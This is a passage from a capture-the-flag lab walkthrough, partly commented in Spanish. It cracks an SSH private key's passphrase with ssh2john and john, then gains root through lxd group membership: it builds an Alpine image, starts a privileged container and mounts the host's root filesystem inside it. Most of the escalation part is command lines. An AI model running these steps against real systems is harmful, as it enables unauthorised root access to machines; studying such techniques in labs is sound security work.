We copy the key to our machine and give it permissions with: chmod 600 id_rsa.
With this key we can try to login via ssh with ssh -i id_rsa john@10.10.192.142 but it asks for the password.
Taking into account that we have a dictionary with possible passwords we can use ssh2john
ssh2john id_rsa > hash
And then using johnand the dictionary, we can crack the key that was used with the RSA key.
Privilege Escalation
Now we can log in via ssh and start with the privilege escalation.
Obtenemos la primer flag
With the id command we can see that we are part of the lxd group and doing some research on the internet we can see that we are able to escalate privileges thanks to this group.
In our machine
sudo su
# Instalamos los requerimientos
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clonamos el repo
git clone https://github.com/lxc/distrobuilder
# Make distrobuilder
cd distrobuilder
make
# Preparamos la creacion de alphine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Creamos el container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18
Then, we upload the files lxd.tar.xz and rootfs.squashfs to the vulnerable machine.
We add the images
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # Podemos ver la nueva iimagen importada
We create a container and add the root path
lxc init alpine privesc -c security.privileged=true
lxc list #Listamos el container
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
We run the container:
lxc start privesc
lxc exec privesc /bin/sh
[email protected]:~# cd /mnt/root # Aca es donde esta montado todo el equipo victima
And that's it, we should now have root privileges.
If any part of the privilege escalation doesn't work for you, here is the repository so you can investigate for yourselves Hacktricks Github.